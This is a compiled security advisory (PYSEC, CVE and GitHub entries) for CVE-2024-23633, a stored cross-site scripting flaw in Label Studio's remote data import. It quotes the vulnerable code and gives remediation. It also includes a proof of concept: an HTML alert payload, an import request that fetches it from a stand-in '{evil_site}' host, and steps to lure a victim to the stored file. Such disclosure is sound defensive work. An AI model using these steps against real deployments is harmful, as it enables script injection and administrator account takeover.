PYSEC-2024-128

Vulnerability from pysec - Published: 2024-01-24 00:15 - Updated: 2024-11-21 14:22

Details

data_import/uploader.py lines 125C5 through 146 showed that if a URL passed the server-side request forgery (SSRF) verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to /api/projects/{project_id}/file-uploads?ids=[{download_id}], where {project_id} was the ID of the project and {download_id} was the ID of the downloaded file. Once the file path was known, data_import/api.py lines 595C1 through 616C62 showed that the Content-Type of the response was determined by the file extension, because mimetypes.guess_type guesses the Content-Type from the extension. An attacker could therefore import a .html file that would execute JavaScript when visited.

Version 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user-provided files that are downloaded by Label Studio, set the Content-Security-Policy: sandbox; response header when they are viewed on the site. The sandbox directive restricts a page's actions to prevent popups and the execution of plugins and scripts, and it enforces a same-origin policy. Alternatively, restrict the file extensions that may be downloaded.
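The header-based remediation can be sketched in a few lines. This is a minimal, framework-independent illustration, not the patch shipped in 1.10.1: the helper name headers_for_user_file is hypothetical, and the extra X-Content-Type-Options header is an assumption added for illustration rather than something the advisory asks for.

```python
from typing import Dict


def headers_for_user_file(content_type: str) -> Dict[str, str]:
    """Build response headers for a file that came from an untrusted source.

    Hypothetical helper: a real application would attach these headers
    to whatever response object its web framework provides.
    """
    return {
        "Content-Type": content_type,
        # Header value taken from the advisory. A bare sandbox directive
        # applies the sandbox restrictions, including blocking scripts.
        "Content-Security-Policy": "sandbox;",
        # Assumption (not in the advisory): ask the browser not to
        # sniff a different type than the one declared above.
        "X-Content-Type-Options": "nosniff",
    }


headers = headers_for_user_file("text/html")
for name, value in headers.items():
    print(f"{name}: {value}")
```

With a header like this in place, an imported .html file could still be displayed, but a browser that honours the directive would not run its scripts in the site's origin.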

Severity

6.1 (Medium)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Impacted products

Name	purl
label-studio	pkg:pypi/label-studio

Aliases

JSON

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "label-studio",
        "purl": "pkg:pypi/label-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ],
      "versions": [
        "0.4.1",
        "0.4.2",
        "0.4.3",
        "0.4.4",
        "0.4.4.post1",
        "0.4.4.post2",
        "0.4.5",
        "0.4.6",
        "0.4.6.post1",
        "0.4.6.post2",
        "0.4.7",
        "0.4.8",
        "0.5.0",
        "0.5.1",
        "0.6.0",
        "0.6.1",
        "0.7.0",
        "0.7.1",
        "0.7.2",
        "0.7.3",
        "0.7.4",
        "0.7.4.post0",
        "0.7.4.post1",
        "0.7.5.post1",
        "0.7.5.post2",
        "0.8.0",
        "0.8.0.post0",
        "0.8.1",
        "0.8.1.post0",
        "0.8.2",
        "0.8.2.post0",
        "0.9.0",
        "0.9.0.post2",
        "0.9.0.post3",
        "0.9.0.post4",
        "0.9.0.post5",
        "0.9.1",
        "0.9.1.post0",
        "0.9.1.post1",
        "0.9.1.post2",
        "1.0.0",
        "1.0.0.post0",
        "1.0.0.post1",
        "1.0.0.post2",
        "1.0.0.post3",
        "1.0.1",
        "1.0.2",
        "1.0.2.post0",
        "1.1.0",
        "1.1.0rc0",
        "1.1.1",
        "1.10.0",
        "1.10.0.post0",
        "1.2",
        "1.3",
        "1.3.post0",
        "1.3.post1",
        "1.4",
        "1.4.1",
        "1.4.1.post0",
        "1.4.1.post1",
        "1.5.0",
        "1.5.0.post0",
        "1.6.0",
        "1.7.0",
        "1.7.1",
        "1.7.2",
        "1.7.3",
        "1.8.0",
        "1.8.1",
        "1.8.2",
        "1.8.2.post0",
        "1.8.2.post1",
        "1.9.0",
        "1.9.1",
        "1.9.1.post0",
        "1.9.2",
        "1.9.2.post0"
      ]
    }
  ],
  "aliases": [
    "CVE-2024-23633",
    "GHSA-fq23-g58m-799r"
  ],
  "details": "Label Studio, an open source data labeling tool had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. Prior to version 1.10.1, this feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image.\n\n`data_import/uploader.py` lines 125C5 through 146 showed that if a URL passed the server side request forgery verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, `data_import/api.py`lines 595C1 through 616C62 demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension. Since the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited.\n\nVersion 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page\u0027s actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy. 
Alternatively, restrict the allowed file extensions that may be downloaded.",
  "id": "PYSEC-2024-128",
  "modified": "2024-11-21T14:22:53.406222+00:00",
  "published": "2024-01-24T00:15:00+00:00",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r"
    },
    {
      "type": "WEB",
      "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146"
    }
  ],
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
      "type": "CVSS_V3"
    }
  ]
}

CVE-2024-23633 (GCVE-0-2024-23633)

Vulnerability from cvelistv5 – Published: 2024-01-23 23:15 – Updated: 2024-11-13 15:24

Title

Label Studio XSS Vulnerability on Data Import

Summary

Label Studio, an open source data labeling tool, had a remote import feature that allowed users to import data from a remote web source; the data was downloaded and could be viewed on the website. Prior to version 1.10.1, this feature could have been abused to download an HTML file that executed malicious JavaScript code in the context of the Label Studio website. Executing arbitrary JavaScript could let an attacker perform malicious actions on Label Studio users if they visit the crafted file. For example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the file.

`data_import/uploader.py` lines 125C5 through 146 showed that if a URL passed the server-side request forgery (SSRF) verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]`, where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the file path was known, `data_import/api.py` lines 595C1 through 616C62 showed that the `Content-Type` of the response was determined by the file extension, because `mimetypes.guess_type` guesses the `Content-Type` from the extension. An attacker could therefore import a `.html` file that would execute JavaScript when visited.

Version 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user-provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when they are viewed on the site. The `sandbox` directive restricts a page's actions to prevent popups and the execution of plugins and scripts, and it enforces a `same-origin` policy. Alternatively, restrict the file extensions that may be downloaded.

Severity

4.7 (Medium)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

CWE

CWE-79 - Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Assigner

GitHub_M

References

URL	Tags
https://github.com/HumanSignal/label-studio/secur…	x_refsource_CONFIRM
https://developer.mozilla.org/en-US/docs/Web/HTTP…	x_refsource_MISC
https://github.com/HumanSignal/label-studio/blob/…	x_refsource_MISC
https://github.com/HumanSignal/label-studio/blob/…	x_refsource_MISC

Impacted products

Vendor	Product	Version
HumanSignal	label-studio	Affected: < 1.10.1

JSON

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-01T23:06:25.341Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r",
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r"
          },
          {
            "name": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox"
          },
          {
            "name": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62"
          },
          {
            "name": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146",
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-23633",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-11-13T15:23:54.398837Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-13T15:24:01.901Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "label-studio",
          "vendor": "HumanSignal",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 1.10.1"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Label Studio, an open source data labeling tool had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. Prior to version 1.10.1, this feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website. Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image.\n\n`data_import/uploader.py` lines 125C5 through 146 showed that if a URL passed the server side request forgery verification checks, the contents of the file would be downloaded using the filename in the URL. The downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, `data_import/api.py`lines 595C1 through 616C62 demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension. Since the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited.\n\nVersion 1.10.1 contains a patch for this issue. Other remediation strategies are also available. For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page\u0027s actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy. 
Alternatively, restrict the allowed file extensions that may be downloaded."
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 4.7,
            "baseSeverity": "MEDIUM",
            "confidentialityImpact": "LOW",
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "CHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
            "version": "3.1"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-79",
              "description": "CWE-79: Improper Neutralization of Input During Web Page Generation (\u0027Cross-site Scripting\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2024-01-23T23:15:09.044Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r"
        },
        {
          "name": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox"
        },
        {
          "name": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62"
        },
        {
          "name": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146",
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146"
        }
      ],
      "source": {
        "advisory": "GHSA-fq23-g58m-799r",
        "discovery": "UNKNOWN"
      },
      "title": " Label Studio XSS Vulnerability on Data Import"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2024-23633",
    "datePublished": "2024-01-23T23:15:09.044Z",
    "dateReserved": "2024-01-19T00:18:53.232Z",
    "dateUpdated": "2024-11-13T15:24:01.901Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

GHSA-FQ23-G58M-799R

Vulnerability from github – Published: 2024-01-24 14:21 – Updated: 2024-11-22 18:20

Summary

Cross-site Scripting Vulnerability on Data Import

Details

Introduction

This write-up describes a vulnerability found in Label Studio, a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to 1.10.1 and was tested on version 1.9.2.post0.

Overview

Label Studio had a remote import feature that allowed users to import data from a remote web source; the data was downloaded and could be viewed on the website. This feature could have been abused to download an HTML file that executed malicious JavaScript code in the context of the Label Studio website.

Description

The following code snippet in Label Studio showed that if a URL passed the SSRF verification checks, the contents of the file would be downloaded using the filename in the URL.

def tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):
    """Download file using URL and read tasks from it"""
    # process URL with tasks
    try:
        filename = url.rsplit('/', 1)[-1]  # <1>

        response = ssrf_safe_get(
            url, verify=project.organization.should_verify_ssl_certs(), stream=True, headers={'Accept-Encoding': None}
        )
        file_content = response.content
        check_tasks_max_file_size(int(response.headers['content-length']))
        file_upload = create_file_upload(user, project, SimpleUploadedFile(filename, file_content))
        if file_upload.format_could_be_tasks_list:
            could_be_tasks_list = True
        file_upload_ids.append(file_upload.id)
        tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(project, file_upload_ids)

    except ValidationError as e:
        raise e
    except Exception as e:
        raise ValidationError(str(e))
    return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list

1. The file name was taken from the last path segment of the URL.
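To make the consequence concrete, the short sketch below isolates the filename logic from the snippet above. The function name filename_from_url and the URL are hypothetical and used only for illustration; the rsplit expression is the one quoted from the advisory.

```python
import posixpath


def filename_from_url(url: str) -> str:
    """Mirror the quoted logic: keep whatever follows the last '/'."""
    return url.rsplit('/', 1)[-1]


# Hypothetical attacker-controlled URL, used only for illustration.
url = "https://evil.example/xss.html"

name = filename_from_url(url)
extension = posixpath.splitext(name)[1]

# Both the stored name and its extension come straight from the URL,
# so whoever supplies the URL also chooses the extension.
print(name)
print(extension)
```

Because nothing in this step inspects the downloaded content, the extension chosen by the URL's author is what later code sees.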

The downloaded file path could then be retrieved by sending a request to /api/projects/{project_id}/file-uploads?ids=[{download_id}] where {project_id} was the ID of the project and {download_id} was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, the following code snippet demonstrated that the Content-Type of the response was determined by the file extension, since mimetypes.guess_type guesses the Content-Type based on the file extension.

class UploadedFileResponse(generics.RetrieveAPIView):
    permission_classes = (IsAuthenticated,)

    @swagger_auto_schema(auto_schema=None)
    def get(self, *args, **kwargs):
        request = self.request
        filename = kwargs['filename']
        # XXX needed, on windows os.path.join generates '\' which breaks FileUpload
        file = settings.UPLOAD_DIR + ('/' if not settings.UPLOAD_DIR.endswith('/') else '') + filename
        logger.debug(f'Fetch uploaded file by user {request.user} => {file}')
        file_upload = FileUpload.objects.filter(file=file).last()

        if not file_upload.has_permission(request.user):
            return Response(status=status.HTTP_403_FORBIDDEN)

        file = file_upload.file
        if file.storage.exists(file.name):
            content_type, encoding = mimetypes.guess_type(str(file.name))  # <1>
            content_type = content_type or 'application/octet-stream'
            return RangedFileResponse(request, file.open(mode='rb'), content_type=content_type)
        else:
            return Response(status=status.HTTP_404_NOT_FOUND)

1. Determines the Content-Type based on the extension of the uploaded file by using mimetypes.guess_type.

Since the Content-Type was determined by the file extension of the downloaded file, an attacker could import a .html file that would execute JavaScript when visited.
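The behaviour of mimetypes.guess_type can be checked in isolation with the standard library. In this small sketch, the wrapper guess_content_type is a hypothetical name that reproduces the fallback used in the snippet above. The first path is the example from this advisory, and the second is an invented name without an extension.

```python
import mimetypes


def guess_content_type(stored_name: str) -> str:
    """Pick a Content-Type from the file name alone, as the view did."""
    content_type, _encoding = mimetypes.guess_type(stored_name)
    return content_type or "application/octet-stream"


# Example path from the advisory: the .html extension selects text/html.
print(guess_content_type("upload/1/cfcfc340-xss.html"))

# Invented name with no extension: the fallback type is used instead.
print(guess_content_type("upload/1/cfcfc340-data"))
```

The file's bytes are never consulted. The name alone decides whether the browser is told to render the response as HTML.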

Proof of Concept

Below are the steps to reproduce this issue:

1. Host the following HTML proof of concept (POC) on an external website with the file extension .html, so that it can be downloaded to the Label Studio website.

<html>
    <body>
        <h1>Data Import XSS</h1>
        <script>
            alert(document.domain);
        </script>
    </body>
</html>

2. Send the following POST request to download the HTML POC to Label Studio, and note the ID of the downloaded file returned in the response. In the following POC, {victim_host} is the address and port of the victim Label Studio website (e.g. labelstudio.com:8080), {project_id} is the ID of the project the data would be imported into, {cookies} are session cookies, and {evil_site} is the website hosting the malicious HTML file (named xss.html in this example).

POST /api/projects/{project_id}/import?commit_to_project=false HTTP/1.1
Host: {victim_host}
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 43
Connection: close
Cookie: {cookies}
Pragma: no-cache
Cache-Control: no-cache

url=https://{evil_site}/xss.html

3. Retrieve the downloaded file path by sending a GET request to /api/projects/{project_id}/file-uploads?ids=[{download_id}], where {download_id} is the ID of the downloaded file from the previous step.

4. Send the victim a link to /data/{file_path}, where {file_path} is the path of the downloaded file from the previous step. The following screenshot demonstrated executing the POC JavaScript code by visiting /data/upload/1/cfcfc340-xss.html.

[Screenshot: xss-import-alert]

Impact

Executing arbitrary JavaScript could let an attacker perform malicious actions on Label Studio users if they visit the crafted file. For example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the file.

Remediation Advice

For all user-provided files that are downloaded by Label Studio, set the Content-Security-Policy: sandbox; response header when they are viewed on the site. The sandbox directive restricts a page's actions to prevent popups and the execution of plugins and scripts, and it enforces a same-origin policy (documentation: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox).
Restrict the file extensions that may be downloaded.
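The extension restriction could look roughly like the following sketch. It is an illustration under stated assumptions, not the check Label Studio implements: the function name is_allowed_upload and the contents of ALLOWED_EXTENSIONS are hypothetical, and a real deployment would choose the set from the formats it actually imports.

```python
import posixpath

# Hypothetical allowlist; the right set depends on the deployment.
ALLOWED_EXTENSIONS = {".json", ".csv", ".tsv", ".txt", ".png", ".jpg"}


def is_allowed_upload(filename: str) -> bool:
    """Accept a file only if its (case-insensitive) extension is listed."""
    extension = posixpath.splitext(filename)[1].lower()
    return extension in ALLOWED_EXTENSIONS


for candidate in ("tasks.json", "xss.html", "XSS.HTML", "noextension"):
    verdict = "accept" if is_allowed_upload(candidate) else "reject"
    print(f"{candidate}: {verdict}")
```

An allowlist is used here rather than a blocklist so that unexpected or newly introduced extensions are rejected by default.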

Discovered

August 2023, Alex Brown, elttam

Severity

4.7 (Medium)

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N

JSON

{
  "affected": [
    {
      "package": {
        "ecosystem": "PyPI",
        "name": "label-studio"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "1.10.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-23633"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-79"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-01-24T14:21:47Z",
    "nvd_published_at": "2024-01-24T00:15:08Z",
    "severity": "MODERATE"
  },
  "details": "# Introduction\n\nThis write-up describes a vulnerability found in [Label Studio](https://github.com/HumanSignal/label-studio), a popular open source data labeling tool. The vulnerability affects all versions of Label Studio prior to `1.10.1` and was tested on version `1.9.2.post0`.\n\n# Overview\n\n[Label Studio](https://github.com/HumanSignal/label-studio) had a remote import feature allowed users to import data from a remote web source, that was downloaded and could be viewed on the website. This feature could had been abused to download a HTML file that executed malicious JavaScript code in the context of the Label Studio website.\n\n# Description\n\nThe following [code snippet in Label Studio](https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146) showed that is a URL passed the SSRF verification checks, the contents of the file would be downloaded using the filename in the URL.\n\n```python\ndef tasks_from_url(file_upload_ids, project, user, url, could_be_tasks_list):\n    \"\"\"Download file using URL and read tasks from it\"\"\"\n    # process URL with tasks\n    try:\n        filename = url.rsplit(\u0027/\u0027, 1)[-1] \u003c1\u003e\n\n        response = ssrf_safe_get(\n            url, verify=project.organization.should_verify_ssl_certs(), stream=True, headers={\u0027Accept-Encoding\u0027: None}\n        )\n        file_content = response.content\n        check_tasks_max_file_size(int(response.headers[\u0027content-length\u0027]))\n        file_upload = create_file_upload(user, project, SimpleUploadedFile(filename, file_content))\n        if file_upload.format_could_be_tasks_list:\n            could_be_tasks_list = True\n        file_upload_ids.append(file_upload.id)\n        tasks, found_formats, data_keys = FileUpload.load_tasks_from_uploaded_files(project, file_upload_ids)\n\n    except ValidationError as e:\n        raise e\n    except Exception as e:\n        raise 
ValidationError(str(e))\n    return data_keys, found_formats, tasks, file_upload_ids, could_be_tasks_list\n```\n1. The file name that was set was retrieved from the URL.\n\nThe downloaded file path could then be retrieved by sending a request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]` where `{project_id}` was the ID of the project and `{download_id}` was the ID of the downloaded file. Once the downloaded file path was retrieved by the previous API endpoint, the [following code snippet](https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62) demonstrated that the `Content-Type` of the response was determined by the file extension, since `mimetypes.guess_type` guesses the `Content-Type` based on the file extension.\n\n```python\nclass UploadedFileResponse(generics.RetrieveAPIView):\n    permission_classes = (IsAuthenticated,)\n\n    @swagger_auto_schema(auto_schema=None)\n    def get(self, *args, **kwargs):\n        request = self.request\n        filename = kwargs[\u0027filename\u0027]\n        # XXX needed, on windows os.path.join generates \u0027\\\u0027 which breaks FileUpload\n        file = settings.UPLOAD_DIR + (\u0027/\u0027 if not settings.UPLOAD_DIR.endswith(\u0027/\u0027) else \u0027\u0027) + filename\n        logger.debug(f\u0027Fetch uploaded file by user {request.user} =\u003e {file}\u0027)\n        file_upload = FileUpload.objects.filter(file=file).last()\n\n        if not file_upload.has_permission(request.user):\n            return Response(status=status.HTTP_403_FORBIDDEN)\n\n        file = file_upload.file\n        if file.storage.exists(file.name):\n            content_type, encoding = mimetypes.guess_type(str(file.name)) \u003c1\u003e\n            content_type = content_type or \u0027application/octet-stream\u0027\n            return RangedFileResponse(request, file.open(mode=\u0027rb\u0027), content_type=content_type)\n        else:\n            return 
Response(status=status.HTTP_404_NOT_FOUND)\n```\n1. Determines the `Content-Type` based on the extension of the uploaded file by using `mimetypes.guess_type`.\n\nSince the `Content-Type` was determined by the file extension of the downloaded file, an attacker could import in a `.html` file that would execute JavaScript when visited.\n\n# Proof of Concept\n\nBelow were the steps to recreate this issue:\n\n1. Host the following HTML proof of concept (POC) script on an external website with the file extension `.html` that would be downloaded to the Label Studio website.\n\n```html\n\u003chtml\u003e\n    \u003cbody\u003e\n        \u003ch1\u003eData Import XSS\u003c/h1\u003e\n        \u003cscript\u003e\n            alert(document.domain);\n        \u003c/script\u003e\n    \u003c/body\u003e\n\u003c/html\u003e\n```\n\n2. Send the following `POST` request to download the HTML POC to the Label Studio and note the returned ID of the downloaded file in the response. In the following POC the `{victim_host}` is the address and port of the victim Label Studio website (eg. `labelstudio.com:8080`), `{project_id}` is the ID of the project where the data would be imported into, `{cookies}` are session cookies and `{evil_site}` is the website hosting the malicious HTML file (named `xss.html` in the following example).\n\n```http\nPOST /api/projects/{project_id}/import?commit_to_project=false HTTP/1.1\nHost: {victim_host}\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\ncontent-type: application/x-www-form-urlencoded\nContent-Length: 43\nConnection: close\nCookie: {cookies}\nPragma: no-cache\nCache-Control: no-cache\n\nurl=https://{evil_site}/xss.html\n```\n\n3. To retrieve the downloaded file path could be retrieved by sending a `GET` request to `/api/projects/{project_id}/file-uploads?ids=[{download_id}]`, where `{download_id}` is the ID of the file download from the previous step.\n\n4. 
Send your victim a link to `/data/{file_path}`, where `{file_path}` is the path of the downloaded file from the previous step. The following screenshot demonstrated executing the POC JavaScript code by visiting `/data/upload/1/cfcfc340-xss.html`.\n\n![xss-import-alert](https://user-images.githubusercontent.com/139727151/282223222-d8f9132c-838e-4aa6-9c03-a2bc83b4a409.png)\n\n# Impact\n\nExecuting arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image. For an example, an attacker can craft a JavaScript payload that adds a new Django Super Administrator user if a Django administrator visits the image.\n\n# Remediation Advice\n\n* For all user provided files that are downloaded by Label Studio, set the `Content-Security-Policy: sandbox;` response header when viewed on the site. The `sandbox` directive restricts a page\u0027s actions to prevent popups, execution of plugins and scripts and enforces a `same-origin` policy ([documentation](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox)).\n* Restrict the allowed file extensions that could be downloaded.\n\n# Discovered\n- August 2023, Alex Brown, elttam",
  "id": "GHSA-fq23-g58m-799r",
  "modified": "2024-11-22T18:20:58Z",
  "published": "2024-01-24T14:21:47Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/security/advisories/GHSA-fq23-g58m-799r"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23633"
    },
    {
      "type": "WEB",
      "url": "https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy/sandbox"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/HumanSignal/label-studio"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/api.py#L595C1-L616C62"
    },
    {
      "type": "WEB",
      "url": "https://github.com/HumanSignal/label-studio/blob/1.9.2.post0/label_studio/data_import/uploader.py#L125C5-L146"
    },
    {
      "type": "WEB",
      "url": "https://github.com/pypa/advisory-database/tree/main/vulns/label-studio/PYSEC-2024-128.yaml"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Cross-site Scripting Vulnerability on Data Import"
}

